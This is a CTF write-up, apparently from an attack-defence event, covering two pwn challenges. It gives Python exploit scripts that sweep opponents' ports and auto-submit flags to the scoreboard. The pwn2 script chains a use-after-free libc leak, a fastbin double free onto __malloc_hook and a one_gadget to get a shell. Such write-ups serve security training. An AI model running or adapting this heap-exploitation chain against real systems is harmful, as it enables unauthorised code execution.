


pwn1

题目整体比较复杂:程序对输入字符串做 base64 编码(注意是编码而不是加密,过程可逆),再用 strcmp 与预设字符串比较,相同则输出 flag。

应该还有其它漏洞,没有细看。

自动攻击脚本(Python 2,依赖 pwntools 与 requests;对每个靶机端口各尝试一次,拿到 flag 后提交到平台):

from pwn import *
import requests
import re
import json
import time
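def upload_flag(flag, challenge_id=1, name='team_name', password='team_passwd'):
    """Log in to the local scoreboard and submit ``flag`` for ``challenge_id``.

    Sequence against the CTFd-style board on 127.0.0.1:8080:
      1. GET /login and read the hidden ``nonce`` input;
      2. POST ``name``/``password``/``nonce`` to /login (the Session keeps the cookie);
      3. GET /challenges and read ``csrf_nonce`` from the inline script;
      4. POST {"challenge_id", "submission"} as JSON to /api/v1/challenges/attempt
         with the token in the ``CSRF-Token`` header, and print the response body.

    Args:
        flag: captured flag; surrounding whitespace/newlines are stripped first.
        challenge_id: scoreboard id of the challenge (1 = pwn1 here).
        name, password: team credentials. The defaults preserve the original
            hard-coded values; pass the real ones at the call site instead of
            editing secrets into this file.

    Raises:
        RuntimeError: when either nonce is missing from the page (login failed,
            board down, or page layout changed) -- the original died with an
            opaque AttributeError on ``None.group`` in that case.
    """
    base = 'http://127.0.0.1:8080'
    login_url = base + '/login'
    req = requests.Session()

    # [^"]+ rather than .+ : a greedy .+ can run past the value's closing quote
    # when anything else follows on the same line.
    m = re.search(r'<input type="hidden" name="nonce" value="([^"]+)">',
                  req.get(login_url).text)
    if m is None:
        raise RuntimeError('login nonce not found at %s' % login_url)

    req.post(url=login_url,
             data={'name': name, 'password': password, 'nonce': m.group(1)})

    m = re.search(r'var csrf_nonce = "([^"]+)";', req.get(base + '/challenges').text)
    if m is None:
        raise RuntimeError('csrf_nonce not found on /challenges; login probably failed')
    # The original printed the CSRF token; it is a per-session secret and of no
    # use in the log, so it is no longer echoed.
    headers = {'CSRF-Token': m.group(1),
               'Content-Type': 'application/json'}

    payload = {'challenge_id': challenge_id, 'submission': flag.strip()}
    print(req.post(url=base + '/api/v1/challenges/attempt',
                   data=json.dumps(payload), headers=headers).text)
    # Pause between submissions (kept from the original; presumably the board
    # rate-limits attempts).
    time.sleep(5)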

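# Target ports for pwn1, one per opposing team (sweep order kept as in the original).
port = [10380, 10480, 10680, 10780, 10880, 11080, 11180, 11280, 11380, 11480,
        11680, 11780, 11880, 12080, 12380, 12480, 12580, 12680, 12780, 12880,
        10580, 10280, 12180, 11980, 12280, 10980]


for p in port:
    sh = None
    try:
        sh = remote('127.0.0.1', p)
        sh.recvuntil('Good luck!\n', timeout=5)
        # Presumably the preimage of the base64 string the binary strcmp()s
        # against; the trailing NUL terminates the input the same way the
        # original did.
        sh.send('iwanaflag\x00')
        flag = sh.recv(0x2a)
        print(flag)
        if 'flag' in flag:
            upload_flag(flag)
    except Exception as e:
        # One dead, patched or unreachable box must not stop the sweep -- but
        # say why it failed. The original bare `except:` also swallowed
        # KeyboardInterrupt, making the loop impossible to abort.
        log.warning('port %d: %r' % (p, e))
    finally:
        # The original only closed on the success path and leaked the socket
        # whenever recv/upload raised.
        if sh is not None:
            sh.close()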

pwn2

UAF 漏洞。先 show 一个已释放的 0x80 chunk 泄露 libc 基址,再用 fastbin double free 把 chunk 分配到 __malloc_hook-0x23 处,将 __realloc_hook 写为 one_gadget、__malloc_hook 写为 realloc+8:借 realloc 入口的压栈指令调节栈帧,使 one_gadget 的约束条件得到满足。

自动攻击脚本(Python 2),后期服务器崩了,没有完整测试。

from pwn import *

import requests
import re
import json
import time
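def upload_flag(flag, challenge_id=2, name='team_name', password='team_passwd'):
    """Log in to the local scoreboard and submit ``flag`` for ``challenge_id``.

    Sequence against the CTFd-style board on 127.0.0.1:8080:
      1. GET /login and read the hidden ``nonce`` input;
      2. POST ``name``/``password``/``nonce`` to /login (the Session keeps the cookie);
      3. GET /challenges and read ``csrf_nonce`` from the inline script;
      4. POST {"challenge_id", "submission"} as JSON to /api/v1/challenges/attempt
         with the token in the ``CSRF-Token`` header, and print the response body.

    Args:
        flag: captured flag; surrounding whitespace/newlines are stripped first.
        challenge_id: scoreboard id of the challenge (2 = pwn2 here).
        name, password: team credentials. The defaults preserve the original
            hard-coded values; pass the real ones at the call site instead of
            editing secrets into this file.

    Raises:
        RuntimeError: when either nonce is missing from the page (login failed,
            board down, or page layout changed) -- the original died with an
            opaque AttributeError on ``None.group`` in that case.
    """
    base = 'http://127.0.0.1:8080'
    login_url = base + '/login'
    req = requests.Session()

    # [^"]+ rather than .+ : a greedy .+ can run past the value's closing quote
    # when anything else follows on the same line.
    m = re.search(r'<input type="hidden" name="nonce" value="([^"]+)">',
                  req.get(login_url).text)
    if m is None:
        raise RuntimeError('login nonce not found at %s' % login_url)

    req.post(url=login_url,
             data={'name': name, 'password': password, 'nonce': m.group(1)})

    m = re.search(r'var csrf_nonce = "([^"]+)";', req.get(base + '/challenges').text)
    if m is None:
        raise RuntimeError('csrf_nonce not found on /challenges; login probably failed')
    # The original printed the CSRF token; it is a per-session secret and of no
    # use in the log, so it is no longer echoed.
    headers = {'CSRF-Token': m.group(1),
               'Content-Type': 'application/json'}

    payload = {'challenge_id': challenge_id, 'submission': flag.strip()}
    print(req.post(url=base + '/api/v1/challenges/attempt',
                   data=json.dumps(payload), headers=headers).text)
    # Pause between submissions (kept from the original; presumably the board
    # rate-limits attempts).
    time.sleep(5)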

# pwn1 port list carried over from the first script. It is rebound to the pwn2
# list further down before the sweep loop runs, so this value is never used here.
port = [
    10380, 10480, 10680, 10780, 10880, 11080, 11180, 11280, 11380, 11480,
    11680, 11780, 11880, 12080, 12380, 12480, 12580, 12680, 12780, 12880,
    10580, 10280, 12180, 11980, 12280, 10980,
]


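def pwn(port):
    """Exploit one pwn2 instance on 127.0.0.1:``port``; return the raw bytes read after ``cat flag``.

    Heap UAF + fastbin double free; every offset is hard-coded for the shipped
    libc-2.23.so:
      1. Free chunk 0 (0x80) and ``show`` it through the dangling pointer. The
         first 6 bytes are a pointer into main_arena; subtracting 0x3c4b78
         (presumably main_arena+0x58 on this libc) gives the libc base.
      2. delete(1), delete(2), delete(1): fastbin double free on the 0x70
         chunks. Re-allocating (chunk 4) overwrites the fd with
         __malloc_hook-0x23, so the third 0x68 allocation (chunk 8) is carved
         out just in front of the hooks.
      3. Chunk 8's data starts at __malloc_hook-0x13, so 11 bytes of padding
         reach __realloc_hook. It is set to the one_gadget (0x4526a) and
         __malloc_hook to __libc_realloc+8; entering realloc first adjusts the
         stack frame so the gadget's constraint holds (see write-up text).
      4. The next allocation (index 10, size 10) fires the hook; ``cat flag``
         is sent to the resulting shell and whatever arrives within 5 s is
         returned (may be empty or partial on a slow/dead box).

    The socket is closed on every exit path; pwntools EOFError / timeout
    exceptions propagate to the caller unchanged.
    """
    sh = remote('127.0.0.1', port)
    libc = ELF('libc-2.23.so')

    # Menu wrappers; the prompt strings are what the binary prints.
    def add(idx, size, data):
        sh.sendlineafter('Your Choice\n', str(1))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
        sh.recvuntil('size>> ')
        sh.sendline(str(size))
        sh.recvuntil('name>> ')
        sh.send(str(data))

    def show(idx):
        sh.sendlineafter('Your Choice\n', str(5))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))

    def edit(idx, data):  # not needed by this chain; kept as the binary's menu option 3
        sh.sendlineafter('Your Choice\n', str(3))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
        sh.recvuntil('name>> ')
        sh.send(str(data))

    def delete(idx):
        sh.sendlineafter('Your Choice\n', str(2))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))

    try:
        add(0, 0x80, 'a' * 0x80)
        add(7, 0x80, 'a' * 0x80)  # presumably keeps chunk 0 from merging into top on free
        add(1, 0x68, 'a' * 0x68)
        add(2, 0x68, 'a' * 0x68)
        add(3, 0x68, 'a' * 0x68)
        delete(0)
        show(0)  # UAF read of the freed chunk's fd
        # The timeout belongs to recv(); the original passed it to u64(), where
        # it had no effect on the read.
        libc_base = u64(sh.recv(6, timeout=5).ljust(8, '\x00')) - 0x3c4b78
        delete(1)
        delete(2)
        delete(1)
        add(4, 0x68, p64(libc_base + libc.symbols['__malloc_hook'] - 0x23) * 2)
        log.success('libc_base: ' + hex(libc_base))
        add(5, 0x68, 'a' * 0x68)
        add(6, 0x68, 'a' * 0x68)
        delete(7)
        add(8, 0x68, 'a' * 11
            + p64(libc_base + 0x4526a)
            + p64(libc_base + libc.symbols['__libc_realloc'] + 0x8))
        # Trigger: malloc -> __malloc_hook (realloc+8) -> __realloc_hook (one_gadget).
        sh.sendlineafter('ice\n', str(1))
        sh.recvuntil('index>> ')
        sh.sendline(str(10))
        sh.recvuntil('size>> ')
        sh.sendline(str(10))
        sh.sendline('cat flag')
        flag = sh.recv(timeout=5)
        print(flag)
        return flag
    finally:
        # The original never closed this socket (and its caller's sh.close()
        # referred to a name that does not exist at module level).
        sh.close()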

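# Target ports for pwn2, one per opposing team (sweep order kept as in the original).
port = [20280, 20380, 20480, 20680, 20780, 20880, 20980, 21080, 21180, 21280,
        21380, 21580, 21680, 21780, 21880, 21980, 22180, 22280, 22380, 22480,
        22580, 22680, 22780, 22880, 22080, 21480, 20580]


for p in port:
    try:
        flag = pwn(p)
        if 'flag' in flag:
            upload_flag(flag)
    except Exception as e:
        # A crashed, patched or unreachable box must not stop the sweep -- but
        # say why it failed. The original bare `except:` also swallowed
        # KeyboardInterrupt, making the loop impossible to abort.
        log.warning('port %d: %r' % (p, e))
        continue
    # NOTE: the original called sh.close() here, but `sh` is local to pwn(),
    # so that line raised NameError (hidden by the bare except) every iteration
    # and no socket was ever closed. The connection has to be closed inside
    # pwn(), which owns it; there is nothing to close at this level.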

总结

这次总体还算可以,后期服务器有点崩;patch 是另一位 pwn 师傅在做,做得也不错。